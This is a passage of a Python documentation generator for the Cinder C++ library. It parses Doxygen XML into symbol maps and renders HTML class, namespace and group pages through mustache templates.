# TODO: These should be dynamic via doxygen generated data. perhaps from _cinder_8h.xml
file_meta = {
"cinder_version": "",
"doxy_version": "",
"creation_date": str(datetime.today().date()),
"docs_root": ""
}
parser = argparse.ArgumentParser(description='CiDocs')
parser.add_argument('path', nargs='?')
parser.add_argument('outpath', nargs='?')
parser.add_argument('-d', '--debug',
action='store_true',
help='show debug arguments')
parser.add_argument('-s', '--skiphtml',
action='store_true',
help='skip html generation')
parser.add_argument('--root',
default=HTML_ROOT_DIR,
help='server html root directory name')
parser.add_argument('--include-analytics',
action='store_true',
help='bool as to wheather to include analytics in frontend')
# various config settings
class Config(object):
def __init__(self):
# break on errors that would prevent the file from being generated
self.BREAK_ON_STOP_ERRORS = True
# whitelisted namespaces to generate pages for
self.NAMESPACE_WHITELIST = [
{
"name": "cinder"
},
{
"name": "glm",
"structure_whitelist":
[
{
"name": "typedefs",
"prefix_blacklist": ["lowp", "mediump", "highp"]
}
]
}
]
# blacklisted namespaces to generate pages for
self.NAMESPACE_BLACKLIST = ["cinder::signals::detail", "cinder::audio::dsp::ooura", "cinder::detail", "glm::detail", "glm::gtc", "glm::gtx", "glm::io"]
# blacklisted class strings - any class containing these strings will be skipped
self.CLASS_LIST_BLACKLIST = ["glm", "@"]
# cinder github repo path
self.GITHUB_PATH = "http://github.com/cinder/Cinder/tree/master"
# file that contains cinder meta data
self.PROJECT_META_FILE = os.path.join(XML_SOURCE_PATH, "_cinder_8h.xml")
# directory for the class template mustache file
self.CLASS_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-class-template.mustache")
# directory for the namespace template mustache file
self.NAMESPACE_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-namespace-template.mustache")
# directory for the namespace template mustache file
self.GROUP_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-group-template.mustache")
# default html template mustache file
self.HTML_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-default-template.mustache")
# guide html template mustache file
self.GUIDE_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-guide-template.mustache")
# reference html template mustache file
self.REFERENCE_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-reference-template.mustache")
# home page template mustache file
self.HOME_TEMPLATE = os.path.join(TEMPLATE_PATH, "page-home-template.mustache")
# file prefixes that indicate that the file should be parsed with the class template
self.CLASS_FILE_PREFIXES = ["class", "struct", "interface"]
# file prefixes that indicate that the file should be parsed with the namespace template
self.NAMESPACE_FILE_PREFIXES = ["namespace"]
# file prefixes that indicate that the file should be parsed with the group template
self.GROUP_FILE_PREFIXES = ["group"]
# configuration properties for different kinds of pages whose content is mostly dynamic from cinder.tag file
self.DYNAMIC_PAGES_CONFIG = [
# namespace list page
{
"id": "namespaces",
"reference_html": "namespaces.html",
"element_id": "namespace-content",
"template": "namespace-list.mustache",
"section": "namespaces",
"searchable": False
},
# class list page
{
"id": "classes",
"reference_html": "classes.html",
"element_id": "classes-content",
"template": "class-list.mustache",
"section": "classes",
"searchable": False
},
# glm reference page
{
"id": "glm",
"reference_html": "reference/glm.html",
"element_id": "glm-reference",
"template": "glm-reference.mustache",
"section": "reference",
"searchable": True
}
]
# config for parsing glm group. In the future, we will standardize and externalize this so that we can
# include and document additional modules
self.GLM_MODULE_CONFIG = {
"namespace": "glm",
"url_prefix": "https://github.com/g-truc/glm/tree/0.9.6.3/",
"group_keys": ["glm", "gtc", "gtx", "group__core"],
"source_file_ext": "hpp"
}
def is_namespace_whitelisted(self, ns_str):
if any([ns_str.startswith(prefix["name"]) for prefix in self.NAMESPACE_WHITELIST]):
return True
return None
def is_namespace_blacklisted(self, ns_str):
if any([ns_str.startswith(prefix) for prefix in self.NAMESPACE_BLACKLIST]):
return True
return False
def get_ns_config(self, ns_str):
for ns in self.NAMESPACE_WHITELIST:
if ns["name"] == ns_str:
return ns
return None
def get_section_config(self, sections, section_name):
if sections:
for sections in sections:
if sections["name"] == section_name:
return sections
return None
return None
def is_section_whitelisted(self, sections, section_name):
'''
Is the section of the page whitelisted
:param sections: list page section configs
:param section_name: name to check agains
:return:
'''
if sections:
for section in sections:
if section["name"] == section_name:
whitelisted = True
break
whitelisted = False
else:
whitelisted = True
return whitelisted
# various state vars
class State(object):
def __init__(self):
self.html_files = []
self.processed_html_files = False
def add_html_file(self, file):
self.html_files.append(file)
# convert docygen markup to html markup
tagDictionary = {
"linebreak": "br",
"emphasis": "em",
"ref": "a",
"ulink": "ulink",
"computeroutput": "code",
"includes": "span",
"simplesect": "span",
"para": "p"
}
# globals
g_tag_xml = None
g_symbolMap = None
g_search_index = None
config = Config()
state = State()
# =========================================================================================================== SYMBOL MAP
# mapping for the tag file with helper functions
class SymbolMap(object):
def __init__(self):
self.namespaces = {}
self.classes = {}
self.typedefs = {}
self.functions = {}
self.files = {}
self.enums = {}
self.groups = {}
class Class(object):
def __init__(self, class_tree):
# name with namespace
self.qualifiedName = class_tree.find('name').text
# name without namespace
self.name = strip_compound_name(self.qualifiedName)
self.path = class_tree.find('filename').text
self.base = class_tree.find('base').text if class_tree.find('base') is not None else ""
self.is_template = True if class_tree.find('templarg') is not None else False
self.functionList = []
self.relatedLinks = []
self.type_defs = []
# Path the the description prefix
self.prefix_content = None
# list of tags to be added to the search index
self.tags = []
self.tags.append(self.name)
def add_related_link(self, link_data):
# check for dupes
if not any(link.link == link_data.link for link in self.relatedLinks):
self.relatedLinks.append(link_data)
def define_prefix(self, content):
self.prefix_content = content
def add_type_def(self, type_def_obj):
self.type_defs.append(type_def_obj)
# add typedef string to search tags
self.tags.append(strip_compound_name(type_def_obj.name))
def add_function(self, fn_name, fn_obj):
self.functionList.append(fn_obj)
# add as a tag if not a duplicated name
if not any(tag == fn_name for tag in self.tags):
self.tags.append(fn_name)
class Namespace(object):
def __init__(self, name, file_name):
self.name = name
self.path = file_name
self.functionList = []
self.tags = []
self.tags.append(self.name)
self.typedefs = []
# add all namespace parts to search tags
for part in self.name.split("::"):
self.tags.append(part)
def add_function(self, fn_name, fn_obj):
self.functionList.append(fn_obj)
# add as a tag if not a duplicate name
if not any(tag == fn_name for tag in self.tags):
self.tags.append(fn_name)
class Typedef(object):
def __init__(self, name, type_def, path):
self.name = name
self.type = type_def
self.path = path
self.sharedFrom = None
class Function(object):
def __init__(self, member_tree, base_class=None):
anchor = member_tree.find("anchor").text
self.name = member_tree.find("name").text
self.base = base_class
self.path = member_tree.find("anchorfile").text + "#" + anchor
self.args = parse_arg_list(member_tree.find("arglist").text)
class File(object):
def __init__(self, name, path, typedefs):
self.name = name
self.path = path
self.typedefs = typedefs
rel_path_arr = self.path.split(PARENT_DIR.replace("\\", "/"))
self.relPath = "".join(rel_path_arr)
class Enum(object):
def __init__(self, name, path):
self.name = name
self.path = path
class Group(object):
def __init__(self, tree):
self.name = tree.find('name').text
self.title = tree.find("title").text
self.path = HTML_SOURCE_PATH + tree.find('filename').text
self.src_path = (XML_SOURCE_PATH + tree.find('filename').text).replace(".html", ".xml")
self.description = self.extract_description()
self.functionList = []
self.subgroup_names = []
self.subgroups = []
self.tags = []
self.tags.append(strip_compound_name(self.name))
self.prefix_content = None
def extract_description(self):
xml_tree = parse_xml(self.src_path)
bs4 = BeautifulSoup()
# use brief description if it exists
description = markup_brief_description(bs4, xml_tree.find(r'compounddef'))
# if not, use detailed description
if not description:
description = markup_description(bs4, xml_tree.find(r'compounddef'))
# extract first sentence of description
if description and description.text:
first_sentence = description.text.split(". ")[0] + "."
new_text = bs4.new_string(first_sentence)
description.contents[0].replace_with(new_text)
else:
description = None
return str(description) if str(description) else ""
def add_function(self, fn_name, fn_obj):
self.functionList.append(fn_obj)
if not any(tag == fn_name for tag in self.tags):
self.tags.append(fn_name)
def add_function(self, ns, fn_name, fn_obj):
self.functions[ns + "::" + fn_name] = fn_obj
# searches the symbolMap for a given symbol, prepending cinder:: if not found as-is
# returns a class
def find_class(self, name):
# replace leading ci:: with cinder:: instead
searchname = str(name)
if searchname.find("ci::") == 0:
searchname = searchname.replace("ci::", "cinder::")
# same key as name
if searchname in self.classes:
return self.classes[searchname]
# key with "cinder::" prepended
elif ("cinder::" + searchname) in self.classes:
return self.classes["cinder::" + searchname]
else:
# iterate through all of the classes with namespace "cinder::" and test against just class name
for className in self.classes:
# if className has "cinder::" and namespace depth > 1, test against name
if className.find("cinder") == 0 and len(className.split("::")) > 1:
testname = className.split("cinder::")[1].rsplit("::", 1)[-1]
if testname == searchname:
return self.classes[className]
# check to see if the name is a typedef that is a shared_ptr to another class
typedef = self.find_typedef(searchname)
if typedef is not None:
if typedef.sharedFrom is not None:
return typedef.sharedFrom
else:
return typedef
# log("typedef " + typedef.name + " was not shared from an existing class", 1)
# check to see if parent is a typedef
searchname_parts = searchname.split("::")
if len(searchname_parts) > 1:
parent_name = searchname_parts[-2]
typedef = self.find_typedef(parent_name)
# if parent is typedef and has a sharedFrom property, find_class against that name
if typedef and typedef.sharedFrom:
return self.find_class("::".join([typedef.sharedFrom.name, searchname_parts[-1]]))
return None
def find_namespace(self, name):
searchname = str(name)
if searchname.find("ci::") == 0:
searchname = searchname.replace("ci::", "cinder::")
# same key as name
if searchname in self.namespaces.keys():
return self.namespaces.get(searchname)
# key with "cinder::" prepended
elif ("cinder::" + searchname) in self.namespaces.keys():
return self.namespaces["cinder::" + searchname]
return None
def find_group(self, name):
return self.groups.get(name)
def get_ordered_namespaces(self):
"""
create an array of strings that include all of the namespaces and return
:return: A list of namespace objects in alphabetical order
"""
namespaces = []
for nsKey in self.namespaces:
ns = self.namespaces[nsKey]
namespaces.append(ns)
# sort by lowercased name
namespaces = sorted(namespaces, key=lambda s: s.name.lower())
return namespaces
def get_whitelisted_namespaces(self):
"""
create a list of namespace objects that consist of only whitelisted namespaces
:return: An alphabetized list of namespace objects
"""
namespaces = []
for nsKey in self.namespaces:
ns = self.namespaces[nsKey]
# get whitelisted namespaces
whitelisted = False
if config.is_namespace_whitelisted(ns.name):
whitelisted = True
blacklisted = False
if config.is_namespace_blacklisted(ns.name):
blacklisted = True
if whitelisted and not blacklisted:
namespaces.append(ns)
# sort by lowercased name
namespaces = sorted(namespaces, key=lambda s: s.name.lower())
return namespaces
def find_typedef(self, name):
searchname = str(name)
if searchname.find("ci::") == 0:
searchname = searchname.replace("ci::", "cinder::")
# same key as name
if searchname in self.typedefs.keys():
return self.typedefs[searchname]
# key with "cinder::" prepended
elif ("cinder::" + searchname) in self.typedefs:
return self.typedefs["cinder::" + searchname]
# key with "glm::" prepended
elif ("glm::" + searchname) in self.typedefs:
return self.typedefs["glm::" + searchname]
else:
# iterate through all of the classes with namespace "cinder::" and test against just class name
for typedef in self.typedefs:
if typedef.find("cinder") == 0 and len(typedef.split("::")) > 1:
testname = typedef.split("cinder::")[1].rsplit("::", 1)[-1]
if testname == searchname:
return self.typedefs[typedef]
return None
def find_function(self, name, argstring=""):
# find function name without namespace and parenthesis
fn_name = strip_compound_name(name.split('(')[0])
# find args and amt of args
args = parse_arg_list(str(argstring))
arg_len = len(args)
# non-optional arguments for the function
req_arg_len = 0
for arg in args:
if arg.find("=") < 0:
req_arg_len += 1
# find parent class first
class_parts = name.split("(")[0].split("::")
class_name = "::".join(class_parts[:-1])
ref_obj = g_symbolMap.find_class(class_name)
# if we can't find a matching function, try a namespace
if ref_obj is None:
ns_search = class_name
if class_name == "":
ns_search = "cinder"
ref_obj = g_symbolMap.find_namespace(ns_search)
# iterate through class/namespace functions
fn_list = []
if ref_obj:
for fn in ref_obj.functionList:
if fn.name == fn_name:
fn_list.append(fn)
# try with cinder::app prefix
# TODO: refactor a bit with the ability to whitespace different namespaces test
if len(fn_list) is 0:
ns_search = class_name
if class_name == "":
ns_search = "cinder::app"
ref_obj = g_symbolMap.find_namespace(ns_search)
# iterate through class/namespace functions
if ref_obj:
for fn in ref_obj.functionList:
if fn.name == fn_name:
fn_list.append(fn)
# iterate through glm groups
if len(fn_list) == 0:
for group in self.groups:
group_ref = self.groups[group]
for fn in group_ref.functionList:
if fn.name == fn_name:
fn_list.append(fn)
# else:
# for fn_key in self.functions:
# # print self.func
# # print self.functions[fn].name
# fn = self.functions[fn_key]
# if fn.name == fn_name:
# fn_list.append(fn)
# print "found match"
# print fn.args
# no functions found in class or namespaces, try search by name
if len(fn_list) == 0:
fn_obj = self.functions.get(fn_name)
fn_list.append(fn_obj)
fn_index = 0
# if we have a bunch of options, we want to whittle it down to the best one
if len(fn_list) > 1:
best_score = 0
for idx, fn in enumerate(fn_list):
# fn_arg_len = len(fn.args)
score = 0
# find amount of required arguments
fn_arg_len = 0
for arg in fn.args:
if arg.find("=") < 0:
fn_arg_len += 1
# if number of passed in args is the same as this function's arg length, add to the score
if arg_len == fn_arg_len:
score += 0.5
# loop through the amount of args in this function
fn_args = fn.args[0:fn_arg_len]
if len(fn_args) > 0:
for i, arg in enumerate(fn_args):
if i + 1 > arg_len:
continue
ratio = (SM(None, arg, args[i]).ratio())
score += (ratio * 2.0)
if score > best_score:
fn_index = idx
best_score = score
found_function = fn_list[fn_index] if len(fn_list) > 0 else None
return found_function
def find_file(self, name):
return self.files.get(name)
def find_file_typedefs(self, name):
return self.find_file(name).typedefs
def find_enum(self, name):
searchname = str(name)
if searchname.find("ci::") == 0:
searchname = searchname.replace("ci::", "cinder::")
# enum_obj = None
# if ns_obj is None:
# # find parent class first
# ns_parts = name.split("::")
# class_name = "::".join(ns_parts[:-1])
# class_obj = g_symbolMap.find_class(class_name)
# same key as name
if searchname in self.enums.keys():
return self.enums.get(searchname)
# key with "cinder::" prepended
elif ("cinder::" + searchname) in self.enums:
return self.enums.get("cinder::" + searchname)
def get_class_ancestors(self, name):
result = []
existingclass = self.find_class(name)
while existingclass and existingclass.base:
result.insert(0, existingclass)
existingclass = self.find_class(existingclass.base)
if result:
return result
else:
return []
def get_class_descendants(self, name):
result = []
for aClass in self.classes:
if self.classes[aClass].base == name:
result.append(self.classes[aClass])
if result:
return result
else:
return []
# def get_link_for_class(self, className):
# """ Get the link for the definition of a class.
# It may include namespace or not.
# """
# # strip down to the name of the class (without namespace)
# return ""
def get_ordered_class_list(self):
""" create an array of classes that include all of the classes and return
the array in alphabetical order """
classes = []
for class_key in self.classes:
class_obj = self.classes[class_key]
classes.append(class_obj)
# sort by lowercased name
return sorted(classes, key=lambda s: s.name.lower())
def find_classes_in_namespace(self, namespace, recursive=True):
ns_classes = []
for class_key in self.classes:
if recursive:
if class_key.startswith(namespace) > 0:
class_obj = self.find_class(class_key)
ns_classes.append(class_obj)
else:
class_pre = get_namespace(class_key)
if namespace == class_pre:
class_obj = self.find_class(class_key)
ns_classes.append(class_obj)
return ns_classes
# ====================================================================================================== FILE DATA TYPES
class FileData(object):
def __init__(self, tree):
self.tree = tree # xml file that describes the page
self.bs4 = None # html file of the actual page
self.name = ""
self.title = ""
self.page_header = ""
self.search_tags = []
self.path = ""
self.kind = ""
self.kind_explicit = ""
def get_content(self):
content = {
"name": self.name,
"title": self.title,
"page_header": self.page_header,
}
return content
class ClassFileData(FileData):
def __init__(self, tree):
FileData.__init__(self, tree)
self.description = None
self.is_template = False
self.template_def_name = ""
self.includes = None
self.typedefs = []
self.classes = []
self.related = []
self.namespace_nav = None
self.prefix = ""
self.enumerations = []
self.public_functions = []
self.public_types = []
self.public_static_functions = []
self.anchors = []
self.protected_functions = []
self.protected_attrs = []
self.class_hierarchy = None
self.friends = []
# fill compound name (with namespace if present)
self.compoundName = str(find_compound_name(tree))
self.stripped_name = strip_compound_name(self.compoundName)
# stripped name (w/o namespace)
name_parts = self.compoundName.rsplit("cinder::", 1)
if len(name_parts) > 1:
self.name = name_parts[1] # without "cinder::"
else:
self.name = name_parts[0]
# kind of file that we are parsing (class, namespace, etc)
self.kind = find_file_kind(tree)
self.kind_explicit = find_file_kind_explicit(tree)
self.namespace = "::".join(self.compoundName.split("::")[0:-1])
ns_list = self.compoundName.split("::")
ns_links = []
# make list of namespace links
for index, ns in enumerate(ns_list[:-1]):
ns_object = g_symbolMap.find_namespace("::".join(ns_list[0:index + 1]))
if ns_object:
ns_link = LinkData(path_join(HTML_DEST_PATH, ns_object.path), ns)
else:
# add inactive link data
ns_link = LinkData("", ns, False)
ns_links.append(ns_link)
self.ns_links = ns_links
def get_content(self):
orig_content = super(ClassFileData, self).get_content()
content = orig_content.copy()
class_content = {
"name": self.stripped_name,
"namespace": self.namespace,
"namespace_links": self.ns_links,
"description": self.description,
"is_template": self.is_template,
"template_def_name": self.template_def_name,
"side_nav_content": {
"include": self.includes,
"typedefs": {
"list": self.typedefs,
"length": len(self.typedefs)
},
"class_hierarchy": self.class_hierarchy,
"classes": {
"list": self.classes,
"length": len(self.classes)
},
"related": {
"list": self.related,
"length": len(self.related)
}
},
"namespace_nav": self.namespace_nav,
"prefix": self.prefix,
"enumerations": {
"anchor": "enumerations",
"list": self.enumerations,
"length": len(self.enumerations)
},
"public_functions": {
"anchor": "public-member-functions",
"list": self.public_functions,
"length": len(self.public_functions)
},
"public_static_functions": {
"anchor": "public-static-functions",
"list": self.public_static_functions,
"length": len(self.public_static_functions)
},
"protected_functions": {
"anchor": "protected-functions",
"list": self.protected_functions,
"length": len(self.protected_functions)
},
"protected_attrs": {
"anchor": "protected-attrs",
"list": self.protected_attrs,
"length": len(self.protected_attrs)
},
"public_types": {
"anchor": "public-types",
"list": self.public_types,
"length": len(self.public_types)
},
"friends": {
"anchor": "friends",
"list": self.friends,
"length": len(self.friends)
}
}
content.update(class_content)
return content
class NamespaceFileData(FileData):
def __init__(self, tree):
FileData.__init__(self, tree)
# stripped name (w/o namespace)
self.compoundName = str(find_compound_name(tree))
self.name = self.compoundName
self.namespaces = []
self.classes = []
self.typedefs = []
self.enumerations = []
self.functions = []
self.free_functions = []
self.variables = []
self.namespace_nav = None
self.kind = find_file_kind(tree)
self.kind_explicit = self.kind
def get_content(self):
orig_content = super(NamespaceFileData, self).get_content()
content = orig_content.copy()
ns_content = {
"namespace_nav": self.namespace_nav,
"namespaces": {
"anchor": "namespaces",
"list": self.namespaces,
"length": len(self.namespaces)
},
"classes": {
"anchor": "classes",
"list": self.classes,
"length": len(self.classes)
},
"typedefs": {
"anchor": "typedefs",
"list": self.typedefs,
"length": len(self.typedefs)
},
"enumerations": {
"anchor": "enumerations",
"list": self.enumerations,
"length": len(self.enumerations)
},
"public_functions": {
"anchor": "functions",
"list": self.functions,
"length": len(self.functions)
},
"free_functions": {
"anchor": "free_functions",
"list": self.free_functions,
"length": len(self.free_functions)
},
"variables": {
"anchor": "variables",
"list": self.variables,
"length": len(self.variables)
}
}
content.update(ns_content)
return content
class GroupFileData(FileData):
def __init__(self, tree, module_config):
FileData.__init__(self, tree)
self.description = ""
self.prefix = ""
self.typedefs = []
self.name = str(find_compound_name(tree))
self.public_functions = []
self.anchors = []
self.config = module_config
self.kind = "module"
self.kind_explicit = self.kind
def get_content(self):
orig_content = super(GroupFileData, self).get_content()
content = orig_content.copy()
group_content = {
"name": self.name,
"description": self.description,
"prefix": self.prefix,
"typedefs": {
"anchor": "typedefs",
"list": self.typedefs,
"length": len(self.typedefs)
},
"subgroups": {
"anchor": "subgroups",
"list": self.subgroups,
"length": len(self.subgroups)
},
# "enumerations": {
# "anchor": "enumerations",
# "list": self.enumerations,
# "length": len(self.enumerations)
# },
"public_functions": {
"anchor": "public-member-functions",
"list": self.public_functions,
"length": len(self.public_functions)
}
# "public_types": {
# "anchor": "public-types",
# "list": self.public_types,
# "length": len(self.public_types)
# }
}
content.update(group_content)
return content
class HtmlFileData(FileData):
def __init__(self, in_path):
FileData.__init__(self, None)
self.html_content = ""
self.group = None
self.pagenav = []
self.kind = "html"
self.kind_explicit = self.kind
if in_path.find("guides"+os.sep) > -1:
self.kind_explicit = "guide"
if in_path.find("reference"+os.sep) > -1:
self.kind_explicit = "reference"
def get_content(self):
orig_content = super(HtmlFileData, self).get_content()
content = dict(orig_content)
template_content = {
"html_content": self.html_content,
"namespace_nav": str(g_namespaceNav),
"pagenav": {
"list": self.pagenav,
"length": len(self.pagenav)
}
}
content.update(template_content)
return content
# ================================================================================================== Misc helper classes
class GuideConfig(object):
def __init__(self, config_json, path, file_name):
config_data = config_json["data"]
# parse subnav
subnav_list = []
self.order = None
if config_data["nav"]:
for index, nav in enumerate(config_data["nav"]):
subnav_obj = {}
link_data = LinkData(os.path.join(path, nav["link"]), nav["label"])
subnav = None
# find order of file in group
if re.match(file_name, nav["link"]):
self.order = index
# find subnav for the matched/current page if it has it
if nav.get("pagenav"):
subnav = self.parse_subnav(path, nav["pagenav"])
subnav_obj["link_data"] = link_data
subnav_obj["length"] = 0
if subnav:
subnav_obj["length"] = len(subnav)
subnav_obj["subnav"] = subnav
subnav_list.append(subnav_obj)
self.pagenav = subnav_list
# add keywords
keywords = []
metadata = config_data["metadata"]
if metadata:
if metadata["keywords"]:
for k in metadata["keywords"]:
keywords.append(k)
self.keywords = keywords
# add seealso ci links
see_also = config_data["seealso"]
self.see_also_label = ""
self.see_also_tags = []
if see_also:
self.see_also_label = config_data["seealso"]["label"]
for ci in config_data["seealso"]["dox"]:
self.see_also_tags.append(ci)
# recursively parse subnav
def parse_subnav(self, path, subnav):
nav = []
for menu in subnav:
subnav_obj = {}
link_data = LinkData(os.path.join(path, menu["link"]), menu["label"])
local_subnav = None
if menu.get("subnav"):
local_subnav = self.parse_subnav(path, menu["subnav"])
subnav_obj["link_data"] = link_data
subnav_obj["length"] = 0
if local_subnav:
subnav_obj["length"] = len(local_subnav)
subnav_obj["subnav"] = local_subnav
nav.append(subnav_obj);
return nav
class LinkData(object):
def __init__(self, link=None, label=None, active=True):
self.link = link
self.label = label
self.active = active
# ==================================================================================================== Utility functions
def find_compound_name(tree):
for compound_def in tree.iter("compounddef"):
for compound_name in compound_def.iter("compoundname"):
return compound_name.text
def find_file_kind(tree):
kind = tree.find(r"compounddef").attrib['kind']
return kind
def find_member_anchor(member):
"""
Parses out the anchor tag from a member
"""
anchor_str = member.attrib["id"].split("_1")[-1]
return anchor_str
def find_file_kind_explicit(tree):
"""
Find a more specific file kind based on the name of the file.
So instead of just class as the tag file specifies its kind as,
it might also be a struct or interface.
:param tree:
:return: string of kind
"""
obj_id = tree.find(r"compounddef").attrib['id']
if obj_id.startswith("struct"):
if obj_id.endswith("_t"):
return "struct_template"
else:
return "struct"
elif obj_id.startswith("interface"):
return "interface"
elif obj_id.startswith("namespace"):
return "namespace"
else:
if obj_id.endswith("_t"):
return "class_template"
else:
return "class"
def find_compound_name_stripped(tree):
compound_name = find_compound_name(tree)
name = strip_compound_name(compound_name)
return name
def strip_compound_name(full_string):
ns_parts = full_string.split("::")
name = "".join(ns_parts[-1])
return name
def parse_arg_list(arg_string):
# replace any commas in < and > enclosures with a temporary delim *** so that they
# don't get in the way when splitting args
arg_list = re.sub(r'(<\s\S*)(,)(\s\S* *>)', r'\1***\3', arg_string)
# split the args into a list
args = arg_list[1:-1].split(', ')
# strip white space
args = map(str.strip, args)
stripped_args = []
for indx, arg in enumerate(args):
is_optional = arg.find("=") > -1
# if there is more than one word, take the last one off
# if len(arg.split(" ")) > 1:
# arg = " ".join(arg.split(" ")[:-1])
# we only want the new list to include required args
if not is_optional:
# replace the temp delimeter with a comma again
arg = arg.replace("***", ",")
stripped_args.append(arg)
# filter empty strings
stripped_args = filter(None, stripped_args)
return stripped_args
def get_namespace(full_string):
ns_parts = full_string.split("::")
prefix = "::".join(ns_parts[:-1]) # parent namespace up to last ::
return prefix
def add_class_to_tag(tag, class_name):
tag["class"] = tag.get("class", []) + [class_name]
def gen_anchor_tag(bs4, anchor_name):
anchor = gen_tag(bs4, "a")
anchor["name"] = anchor_name
return anchor
def gen_tag(bs4, tag_type, classes=None, contents=None):
""" Generates a new html element and optionally adds classes and content
Args:
bs4: beautiful soup
tagType: html tag/element (p, a, em, etc)
classes: array of strings that you want as classes for the element
contents: any content that you want to populate your tag with, if known
"""
new_tag = bs4.new_tag(tag_type)
if classes:
for c in classes:
add_class_to_tag(new_tag, c)
if contents:
if type(contents) is list:
for c in contents:
new_tag.append(clone(c))
else:
new_tag.append(contents)
return new_tag
def gen_link_tag(bs4, text, link, target = "_self"):
link_tag = gen_tag(bs4, "a", [], text)
define_link_tag(link_tag, {"href": link})
link_tag["target"] = target
return link_tag
def gen_rel_link_tag(bs4, text, link, src_dir, dest_dir):
"""
Generates a link tag that was relative to the source directory, but should now be relative to the destination directory
:param bs4: beautifulsoup instance
:param text: text of link
:param link: relative link
:param src_dir: original source directory
:param dest_dir: destination source directory
:return: the link tag
"""
# make sure they are dirs
src_dir = os.path.dirname(src_dir) + os.sep
dest_dir = os.path.dirname(dest_dir) + os.sep
new_link = relative_url(dest_dir, link)
link_tag = gen_link_tag(bs4, text, new_link)
return link_tag
def replace_element(bs4, element, replacement_tag):
"""
Replaces an html element with another one, keeping the text contents.
Use Case: Useful for replacing links with em tags or divs with spans
:param bs4: Beautiful Soup instance doing the work
:param element: element to change
:param replacement_tag: new element type to change to
:return:
"""
if not element:
return
text_content = element.text
replacement = gen_tag(bs4, replacement_tag, None, text_content)
element.replace_with(replacement)
def get_body_content(bs4):
return_str = ""
for content in bs4.body.contents:
content_utf = unicode(content).encode("utf-8", errors="replace")
content_str = content_utf.decode("utf-8", errors="replace")
if type(content) is Comment:
return_str += "<!-- " + content_str + "-->"
else:
return_str += content_str
return return_str
def extract_anchor(element):
if element.attrib["id"]:
return element.attrib["id"].split("_1")[-1]
else:
return None
def define_link_tag(tag, attrib):
ref_id = None
href = None
if "refid" in attrib:
ref_id = attrib["refid"]
href = ref_id + ".html"
if "kindref" in attrib:
kind = attrib["kindref"]
if kind == "member":
str_list = ref_id.rsplit("_1", 1)
href = str_list[0] + ".html#" + str_list[1]
if "linkid" in attrib:
href = "../../include/cinder/" + attrib["linkid"]
if "href" in attrib:
href = attrib["href"]
if "typedef" in attrib:
data = attrib["typedef"]
file_name = data.find("anchorfile").text
anchor = data.find("anchor").text
href = file_name + "#" + anchor
if href is None:
log("DEFINING LINK TAG: " + str(tag), 1)
else:
tag["href"] = href
def parse_member_definition(bs4, member, member_name=None):
"""
Parses a function tree and generates an object out of it
:param bs4: beautifulsoup instance
:param member: the member to parse
:param member_name: the name of the class that's being parsed
:return: the data object
"""
if not member_name:
member_name = member.find(r"name")
member_name = member_name.text if member_name is not None else None
anchor = find_member_anchor(member)
# return type
return_div = gen_tag(bs4, "span")
return_markup = iterate_markup(bs4, member.find(r"type"), return_div)
# if id has a glm group key, replace link with <em>. The links are irrelevent atm
if any(member.attrib["id"].find(group_key) > -1 for group_key in config.GLM_MODULE_CONFIG["group_keys"]):
if return_markup:
replace_element(bs4, return_markup.a, "em")
return_str = str(return_markup)
# get args
argstring = member.find("argsstring")
if argstring is None:
argstring = member.find("arglist")
argstring_text = argstring.text if argstring is not None else ""
# description
description_div = markup_description(bs4, member)
description_str = str(description_div) if len(description_div.text) > 0 else None
member_obj = {
"name": member_name,
"return": return_str,
"anchor": anchor,
"definition": {
"name": member_name,
"args": argstring_text
},
"description": description_str
}
return member_obj
def parse_function(bs4, member, class_name=None):
member_name = member.find(r"name")
member_name = member_name.text if member_name is not None else None
is_constructor = False
# determine if it is a constructor
if class_name is not None:
if member_name is not None and member_name == strip_compound_name(class_name):
is_constructor = True
member_obj = parse_member_definition(bs4, member, member_name)
member_obj["is_constructor"] = is_constructor
return member_obj
def parse_enum(bs4, member):
member_obj = parse_member_definition(bs4, member)
values = []
for val in member.findall("enumvalue"):
enum_name = val.find("name").text
values.append({"name": enum_name})
member_obj["values"] = values
member_obj["return"] = "enum"
return member_obj
def define_tag(bs4, tag_name, tree):
""" Creates a new html element with the specified tag_name. "a" tags and "ulink"
tags are different since it generates a tags with links defined in the tree.
Args:
bs4: BeautifulSoup instance
tag_name: What the new tag should be
tree: original element tree which contains extra optional information
"""
if tag_name == "a":
new_tag = bs4.new_tag(tag_name)
define_link_tag(new_tag, tree.attrib)
# creates a new tag with a relative link using the data from the original tag
# TODO: refactor define_tag and ren_link_tags. Should be able to create relative link on its own
# new_tag = gen_rel_link_tag(bs4, "", new_tag["href"], TEMPLATE_PATH, DOXYGEN_HTML_PATH)
new_tag = gen_link_tag(bs4, "", "../" + new_tag["href"])
elif tag_name == "ulink":
# ulinks are for external links
new_tag = bs4.new_tag("a")
new_tag = gen_link_tag(bs4, "", tree.attrib['url'], "_blank")
else:
new_tag = bs4.new_tag(tag_name)
return new_tag
def iter_class_base(class_def, hierarchy):
""" Iterates the class to find all of their base classes
and iterate through them
Args:
classDef: The instance of SymbolMap::Class Object whose base we are searching for
hierachy: The current hierachy of classes to append to if we find another base
"""
if class_def is None or hasattr(class_def, 'name') is False:
return False
base = class_def.base
if base is None:
return False
else:
new_tree = g_symbolMap.find_class(base)
# add to hierarchy if it continues
if iter_class_base(new_tree, hierarchy) is not False:
hierarchy.append(new_tree)
def gen_class_hierarchy(bs4, class_def):
""" Generates the class hierarchy side bar, with each class linking
out to its class file.
Args:
bs4: The current beautifulSoup html instance
classDef: The instance of SymbolMap::Class Object that we are generating
the hierachy for
Returns:
Empty if there is no base class
Ul if there is hierarchy
"""
if class_def is None:
return
# first item in the list will be the original class
hierarchy = []
# get the class' hierarchy
iter_class_base(class_def, hierarchy)
hierarchy.append(class_def)
if len(hierarchy) == 1:
return
# create all of the markup
ul = gen_tag(bs4, "ul")
add_class_to_tag(ul, "inheritence")
# go through the hierarchy and add a list item for each member
# for index, base in enumerate(reversed(hierarchy)):
for index, base in enumerate(hierarchy):
li = gen_tag(bs4, "li")
add_class_to_tag(li, "depth" + str(index + 1))
# link out only if a base class, not the original class
if index < len(hierarchy) - 1:
a = gen_tag(bs4, "a", [], base.qualifiedName)
define_link_tag(a, {'href': base.path})
